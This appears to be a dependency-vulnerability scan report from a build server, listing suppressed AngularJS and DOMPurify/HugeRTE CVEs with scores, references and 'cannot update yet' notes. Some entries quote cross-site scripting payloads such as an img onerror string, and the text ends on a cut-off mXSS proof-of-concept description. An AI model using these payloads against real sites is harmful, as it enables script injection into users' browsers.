- 36c7be3b-2937-45df-85ea-ca7133ea542c - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://codepen.io/herodevs/full/bGPQgMp/8da9ce87e99403ee13a295c305ebfa0b>
- info - <https://github.com/advisories/GHSA-mqm9-c95h-x2p6>
- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2024-8373>
- info - <https://www.herodevs.com/vulnerability-directory/cve-2024-8373>

Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions up to (including) 1.8.3
- cpe:2.3:a:netapp:active\_iq\_unified\_manager:\*:\*:\*:\*:linux:\*:\*
- cpe:2.3:a:netapp:active\_iq\_unified\_manager:\*:\*:\*:\*:vsphere:\*:\*
- cpe:2.3:a:netapp:active\_iq\_unified\_manager:\*:\*:\*:\*:windows:\*:\*

**CVE-2025-2336** (RETIREJS) suppressed

Notes: We can not yet update to newer Angular Version

Unscored:

- Severity: medium

References:

- info - <https://codepen.io/herodevs/pen/bNGYaxX/412a3a4218387479898912f60c269c6c>
- info - <https://github.com/advisories/GHSA-4p4w-6hg8-63wx>
- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2025-2336>
- info - <https://www.herodevs.com/vulnerability-directory/cve-2025-2336>

Vulnerable Software & Versions (RETIREJS):

**CVE-2025-4690** (RETIREJS) suppressed

Notes: We can not yet update to newer Angular Version

Unscored:

- Severity: medium

References:

- info - <https://codepen.io/herodevs/pen/RNNEPzP/751b91eab7730dff277523f3d50e4b77>
- info - <https://github.com/advisories/GHSA-hfff-63hg-f47j>
- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2025-4690>
- info - <https://www.herodevs.com/vulnerability-directory/cve-2025-4690>

Vulnerable Software & Versions (RETIREJS):

**CVE-2025-0716** (RETIREJS) suppressed



Notes: We can not yet update to newer Angular Version

Unscored:

- Severity: low

References:

- info - <https://codepen.io/herodevs/pen/qEWQmpd/a86a0d29310e12c7a3756768e6c7b915>
- info - <https://github.com/advisories/GHSA-j58c-ww9w-pwp5>
- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2025-0716>
- info - <https://www.herodevs.com/vulnerability-directory/cve-2025-0716>

Vulnerable Software & Versions (RETIREJS):

**End-of-Life: Long term support for AngularJS has been discontinued as of December 31, 2021 (RETIREJS)** suppressed

End-of-Life: Long term support for AngularJS has been discontinued as of December 31, 2021

Notes: file name: remotegui.zip: angularjs.jar We can not yet update to newer Angular Version

Unscored:

- Severity: low

References:

- info - <https://docs.angularjs.org/misc/version-support-status>
- retid - 54

Vulnerable Software & Versions (RETIREJS):

## remotegui.zip: angular.jar: angular.min.js

**File Path:** /home/jenkins/workspace/reporting/Check-Product-Installer-for-Security-Problems/CRInstaller/server/build/tmp/dependencies/i-net Clear Reports/plugins/remotegui.zip/angular.jar/META-INF/resources/webjars/angular/1.8.3/angular.min.js

**MD5:** 967a32633fa8f38f4ac3376c1a37b992

**SHA1:** b53b74d8e0b732dcdb98fbe521146b88299ea2f1

**SHA256:** 396dc1a03d6cc02e9c51a80246e0db53c5c8df9bd07287e3b51bce4a29dab355

**Referenced In Project/Scope:** server

Evidence



Suppressed Identifiers

- None

Suppressed Vulnerabilities



[CVE-2022-25844](#) suppressed

The package angular after 1.7.0 are vulnerable to Regular Expression Denial of Service (ReDoS) by providing a custom locale rule that makes it possible to assign the parameter in posPre: ' '.repeat() of NUMBER\_FORMATS.PATTERNS[1].posPre with a very high value.  
\*\*Note:\*\* 1) This package has been deprecated and is no longer maintained. 2) The vulnerable versions are 1.7.0 and higher.

#### CWE-1333 Inefficient Regular Expression Complexity

Notes: We can not yet update to newer Angular Version

#### CVSSv3:

- HIGH (7.5)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RC:R/MAV:A

#### CVSSv2:

- Base Score: MEDIUM (5.0)
- Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P

#### References:

- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2WUSPYOTOMAZPDEFWPSCSPMNODRDKK3/>
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7LNAKCNTVBIHWAUT3FKWV5N67PQXSZOO/>
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/advisories/GHSA-m2h2-264f-f486>
- report@snyk.io - <https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2WUSPYOTOMAZPDEFWPSCSPMNODRDKK3/>
- report@snyk.io - <https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7LNAKCNTVBIHWAUT3FKWV5N67PQXSZOO/>
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [THIRD\\_PARTY\\_ADVISORY](#)

#### Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions from (including) 1.7.0
- cpe:2.3:a:netapp:ontap\_select\_deploy\_administration\_utility:\*:\*:\*:\*:\*

[CVE-2024-21490](#) suppressed

This affects versions of the package angular from 1.3.0. A regular expression used to split the value of the ng-srcset directive is vulnerable to super-linear runtime due to backtracking. With large carefully-crafted input, this can result in catastrophic backtracking and cause a denial of service. \*\*Note:\*\* This package is EOL and will not receive any updates to address this issue. Users should migrate to [[@angular/core](https://www.npmjs.com/package/@angular/core)](<https://www.npmjs.com/package/@angular/core>).

#### CWE-1333 Inefficient Regular Expression Complexity

Notes: We can not yet update to newer Angular Version

#### CVSSv3:

- HIGH (7.5)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RC:R/MAV:A

#### References:

- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/advisories/GHSA-4w4v-5hc9-xrr2>
- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2024-21490>
- info - <https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-6241746>
- info - <https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-6241747>
- info - <https://security.snyk.io/vuln/SNYK-JS-ANGULAR-6091113>
- info - <https://stackblitz.com/edit/angularjs-vulnerability-ng-srcset-redos>
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [THIRD\\_PARTY\\_ADVISORY](#)

#### Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angular.js:\*:\*:\*:\*:\* versions from (including) 1.3.0

[CVE-2022-25869](#) suppressed

All versions of the package angular; all versions of the package angularjs.core; all versions of the package angularjs are vulnerable to Cross-site Scripting (XSS) due to insecure page caching in the Internet Explorer browser, which allows interpolation of <textarea> elements.

CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Notes: We can not yet update to newer Angular Version

#### CVSSv3:

- MEDIUM (6.1)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:P/RC:R/MAV:A

#### References:

- af854a3a-2127-422b-91ae-364da2661108 - [BROKEN\\_LINK](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/advisories/GHSA-prc3-vjfx-vhm9>
- report@snyk.io - <https://neverendingsupport.github.io/angularjs-poc-cve-2022-25869>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-DOTNET-ANGULARJS-10771617>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-DOTNET-ANGULARJSCORE-6084031>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-2949783>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBANGULAR-2949784>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-2949782>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-JS-ANGULAR-2949781>

#### Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\*

[CVE-2023-26116](#) suppressed

Versions of the package angular from 1.2.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the angular.copy() utility function due to the usage of an insecure regular expression. Exploiting this vulnerability is possible by a large carefully-crafted input, which can result in catastrophic backtracking.

CWE-1333 Inefficient Regular Expression Complexity

Notes: We can not yet update to newer Angular Version

CVSSv3:

- MEDIUM (5.3)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RC:R/MAV:A

References:

- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [MAILING\\_LIST,THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/advisories/GHSA-2vrf-hf26-jrp5>
- report@snyk.io - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
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- report@snyk.io - [MAILING\\_LIST,THIRD\\_PARTY\\_ADVISORY](#)

Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions from (including) 1.2.21; versions up to (including) 1.8.3

[CVE-2023-26117](#) suppressed

Versions of the package angular from 1.0.0 are vulnerable to Regular Expression Denial of Service (ReDoS) via the \$resource service due to the usage of an insecure regular expression. Exploiting this vulnerability is possible by a large carefully-crafted input, which can result in catastrophic backtracking.

CWE-1333 Inefficient Regular Expression Complexity

Notes: We can not yet update to newer Angular Version

CVSSv3:

- MEDIUM (5.3)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RC:R/MAV:A

References:

- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [MAILING\\_LIST,THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/advisories/GHSA-2qgx-w9hr-q5gx>
- report@snyk.io - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)

- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [MAILING\\_LIST,THIRD\\_PARTY\\_ADVISORY](#)

Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions from (including) 1.0.0; versions up to (including) 1.8.3

[CVE-2023-26118](#) suppressed

Versions of the package angular from 1.4.9 are vulnerable to Regular Expression Denial of Service (ReDoS) via the <input type="url"> element due to the usage of an insecure regular expression in the input[url] functionality. Exploiting this vulnerability is possible by a large carefully-crafted input, which can result in catastrophic backtracking.

CWE-1333 Inefficient Regular Expression Complexity

Notes: We can not yet update to newer Angular Version

CVSSv3:

- MEDIUM (5.3)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RC:R/MAV:A

References:

- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [MAILING\\_LIST,THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/advisories/GHSA-qwqh-hm9m-p5hr>
- report@snyk.io - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- report@snyk.io - [EXPLOIT](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [MAILING\\_LIST,THIRD\\_PARTY\\_ADVISORY](#)

Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions from (including) 1.4.9; versions up to (including) 1.8.3

[CVE-2024-8372](#) suppressed

Improper sanitization of the value of the 'srcset' attribute in AngularJS allows attackers to bypass common image source restrictions, which can also lead to a form of Content Spoofing [https://owasp.org/www-community/attacks/Content\\_Spoofing](https://owasp.org/www-community/attacks/Content_Spoofing) .

This issue affects AngularJS versions 1.3.0-rc.4 and greater.

Note:

The AngularJS project is End-of-Life and will not receive any updates to address this issue. For more information see [here https://docs.angularjs.org/misc/version-support-status](https://docs.angularjs.org/misc/version-support-status) .

CWE-1289 Improper Validation of Unsafe Equivalence in Input, NVD-CWE-Other

Notes: We can not yet update to newer Angular Version

CVSSv3:

- MEDIUM (4.3)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N/E:P/RC:R/MAV:A

#### References:

- 36c7be3b-2937-45df-85ea-ca7133ea542c - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- 36c7be3b-2937-45df-85ea-ca7133ea542c - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://codepen.io/herodevs/full/xxoQRNL/0072e627abe03e9cda373bc75b4c1017>
- info - <https://github.com/advisories/GHSA-m9gf-397r-hwpg>
- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2024-8372>
- info - <https://www.herodevs.com/vulnerability-directory/cve-2024-8372>

#### Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions from (including) 1.3.1; versions up to (including) 1.8.3
- cpe:2.3:a:angularjs:angularjs:1.3.0:rc4:\*:\*:\*:\*
- cpe:2.3:a:angularjs:angularjs:1.3.0:rc5:\*:\*:\*:\*
- cpe:2.3:a:netapp:active\_iq\_unified\_manager:\*:\*:\*:\*:linux:\*
- cpe:2.3:a:netapp:active\_iq\_unified\_manager:\*:\*:\*:\*:vsphere:\*
- cpe:2.3:a:netapp:active\_iq\_unified\_manager:\*:\*:\*:\*:windows:\*

#### [CVE-2024-8373](#) suppressed

Improper sanitization of the value of the [srcset] attribute in <source> HTML elements in AngularJS allows attackers to bypass common image source restrictions, which can also lead to a form of Content Spoofing [https://owasp.org/www-community/attacks/Content\\_Spoofing](https://owasp.org/www-community/attacks/Content_Spoofing) .

This issue affects all versions of AngularJS.

#### Note:

The AngularJS project is End-of-Life and will not receive any updates to address this issue. For more information see here <https://docs.angularjs.org/misc/version-support-status> .

CWE-791 Incomplete Filtering of Special Elements, NVD-CWE-Other

Notes: We can not yet update to newer Angular Version

#### CVSSv3:

- MEDIUM (4.3)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N/E:P/RC:R/MAV:A

#### References:

- 36c7be3b-2937-45df-85ea-ca7133ea542c - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- 36c7be3b-2937-45df-85ea-ca7133ea542c - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://codepen.io/herodevs/full/bGPQgMp/8da9ce87e99403ee13a295c305ebfa0b>
- info - <https://github.com/advisories/GHSA-mqmq-9c95h-x2p6>
- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2024-8373>
- info - <https://www.herodevs.com/vulnerability-directory/cve-2024-8373>

#### Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions up to (including) 1.8.3
- cpe:2.3:a:netapp:active\_iq\_unified\_manager:\*:\*:\*:\*:linux:\*
- cpe:2.3:a:netapp:active\_iq\_unified\_manager:\*:\*:\*:\*:vsphere:\*
- cpe:2.3:a:netapp:active\_iq\_unified\_manager:\*:\*:\*:\*:windows:\*

#### [CVE-2025-2336 \(RETIREJS\)](#) suppressed



Notes: We can not yet update to newer Angular Version

Unscored:

- Severity: medium

References:

- info - <https://codepen.io/herodevs/pen/bNGYxX/412a3a4218387479898912f60c269c6c>
- info - <https://github.com/advisories/GHSA-4p4w-6hg8-63wx>
- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2025-2336>
- info - <https://www.herodevs.com/vulnerability-directory/cve-2025-2336>

Vulnerable Software & Versions (RETIREJS):

**CVE-2025-4690** (RETIREJS) suppressed

Notes: We can not yet update to newer Angular Version

Unscored:

- Severity: medium

References:

- info - <https://codepen.io/herodevs/pen/RNNEPzP/751b91eab7730dff277523f3d50e4b77>
- info - <https://github.com/advisories/GHSA-hfff-63hg-f47j>
- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2025-4690>
- info - <https://www.herodevs.com/vulnerability-directory/cve-2025-4690>

Vulnerable Software & Versions (RETIREJS):

**CVE-2025-0716** (RETIREJS) suppressed

Notes: We can not yet update to newer Angular Version

Unscored:

- Severity: low

References:

- info - <https://codepen.io/herodevs/pen/qEWQmpd/a86a0d29310e12c7a3756768e6c7b915>
- info - <https://github.com/advisories/GHSA-j58c-ww9w-pwp5>
- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2025-0716>
- info - <https://www.herodevs.com/vulnerability-directory/cve-2025-0716>

Vulnerable Software & Versions (RETIREJS):

**End-of-Life: Long term support for AngularJS has been discontinued as of December 31, 2021** (RETIREJS) suppressed

End-of-Life: Long term support for AngularJS has been discontinued as of December 31, 2021

Notes: file name: remotegui.zip: angularjs.jar We can not yet update to newer Angular Version

Unscored:

- Severity: low

References:

- info - <https://docs.angularjs.org/misc/version-support-status>
- retid - 54

Vulnerable Software & Versions (RETIREJS):

## remotegui.zip: hugerte.jar: hugerte.js

**File Path:** /home/jenkins/workspace/reporting/Check-Product-Installer-for-Security-Problems/CRInstaller/server/build/tmp/dependencies/i-net Clear Reports/plugins/remotegui.zip/hugerte.jar/META-INF/resources/webjars/hugerte/1.0.10/hugerte.js

**MD5:** 0a6efbdc07b365918a67844e02cb30e2

**SHA1:** 54aae4c54cceb8eea1b3b9f74d958d813a113a3

**SHA256:** b366d47bca68c558550a58193bd4a1e05a1f5ef98cbaab316e392937da38f3eb

**Referenced In Project/Scope:** server

### Evidence



### Suppressed Identifiers

- None

### Suppressed Vulnerabilities



#### [CVE-2026-0540](#) suppressed

DOMPurify 3.1.3 through 3.3.1 and 2.5.3 through 2.5.8, fixed in commit 2726c74, contain a cross-site scripting vulnerability that allows attackers to bypass attribute sanitization by exploiting five missing rawtext elements (noscript, xmp, noembed, noframes, iframe) in the SAFE\_FOR\_XML regex. Attackers can include payloads like `</noscript><img src=x onerror=alert(1)>` in attribute values to execute JavaScript when sanitized output is placed inside these unprotected rawtext contexts.

CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Notes: HugeRTE: There is currently no fixed date. <https://github.com/hugerte/hugerte/issues/128#issuecomment-4025527015>

CVSSv4:

- MEDIUM (5.3)
- CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSX:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

CVSSv3:

- MEDIUM (6.1)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:P/RC:R/MAV:A

References:

- help@fluidattacks.com - <https://fluidattacks.com/advisories/daft>
- help@fluidattacks.com - <https://github.com/cure53/DOMPurify/commit/302b51de22535cc90235472c52e3401bedd46f80>
- help@fluidattacks.com - <https://github.com/cure53/DOMPurify/releases/tag/3.3.2>
- help@fluidattacks.com - [PRODUCT](#)
- help@fluidattacks.com - [THIRD PARTY ADVISORY](#)
- info - <https://github.com/cure53/DOMPurify/commit/fca0a938b4261ddc9c0293a289935a9029c049f5>
- info - <https://www.vulncheck.com/advisories/dompurify-xss-via-missing-rawtext-elements-in-safe-for-xml>

- info - <https://www.vulncheck.com/advisories/dompurify-xss-via-missing-rawtext-elements-in-safehtml>

#### Vulnerable Software & Versions (NVD):

- cpe:2.3:a:cure53:dompurify:\*:\*:\*:\*:\* versions from (including) 2.5.3; versions up to (including) 2.5.8
- cpe:2.3:a:cure53:dompurify:\*:\*:\*:\*:\* versions from (including) 3.1.3; versions up to (including) 3.3.1

#### [CVE-2025-15599](#) suppressed

DOMPurify 3.1.3 through 3.2.6 and 2.5.3 through 2.5.8 contain a cross-site scripting vulnerability that allows attackers to bypass attribute sanitization by exploiting missing textarea rawtext element validation in the SAFE\_FOR\_XML regex. Attackers can include closing rawtext tags like `</textarea>` in attribute values to break out of rawtext contexts and execute JavaScript when sanitized output is placed inside rawtext elements. The 3.x branch was fixed in 3.2.7; the 2.x branch was never patched.

#### CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Notes: HugeRTE: There is currently no fixed date. <https://github.com/hugerte/hugerte/issues/128#issuecomment-4025527015>

#### CVSSv4:

- MEDIUM (5.1)
- CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSX:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

#### CVSSv3:

- MEDIUM (6.1)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:P/RC:R/MAV:A

#### References:

- disclosure@vulncheck.com - [PATCH](#)
- disclosure@vulncheck.com - [PRODUCT](#)
- disclosure@vulncheck.com - [THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/cure53/DOMPurify/commit/c861f5a83fb8d90800f1680f855fee551161ac2b>
- info - <https://www.vulncheck.com/advisories/dompurify-xss-via-textarea-rawtext-bypass-in-safe-for-xml>
- info - <https://www.vulncheck.com/advisories/dompurify-xss-via-textarea-rawtext-bypass-in-safehtml>

#### Vulnerable Software & Versions (NVD):

- cpe:2.3:a:cure53:dompurify:\*:\*:\*:\*:\* versions from (including) 2.5.3; versions up to (including) 2.5.8
- cpe:2.3:a:cure53:dompurify:\*:\*:\*:\*:\* versions from (including) 3.1.3; versions up to (excluding) 3.2.7

**## Description** A mutation-XSS (mXSS) condition was confirmed when sanitized HTML is reinserted into a new parsing context using `innerHTML` and special wrappers. The vulnerable wrappers confirmed in browser behavior are `script`, `xmp`, `iframe`, `noembed`, `noframes`, and `noscript`. The payload remains seemingly benign after `DOMPurify.sanitize()`, but mutates during the second parse into executable markup with an event handler, enabling JavaScript execution in the client (`alert(1)` in the PoC). **## Vulnerability** The root cause is context switching after sanitization: sanitized output is treated as trusted and concatenated into a wrapper string (for example, `<xmp> ... </xmp>` or other special wrappers) before being reparsed by the browser. In this flow, attacker-controlled text inside an attribute (for example `</xmp>` or equivalent closing sequences for each wrapper) closes the special parsing context early and reintroduces attacker markup (`<img ... onerror=...>`) outside the original attribute context. DOMPurify sanitizes the original parse tree, but the application performs a second parse in a different context, reactivating dangerous tokens (classic mXSS pattern). **## PoC** 1. Start the PoC app: `bash npm install npm start` 2. Open `http://localhost:3001`. 3. Set 'Wrapper en sink' to `xmp`. 4. Use payload: `html <img src=x alt="</xmp><img src=x`

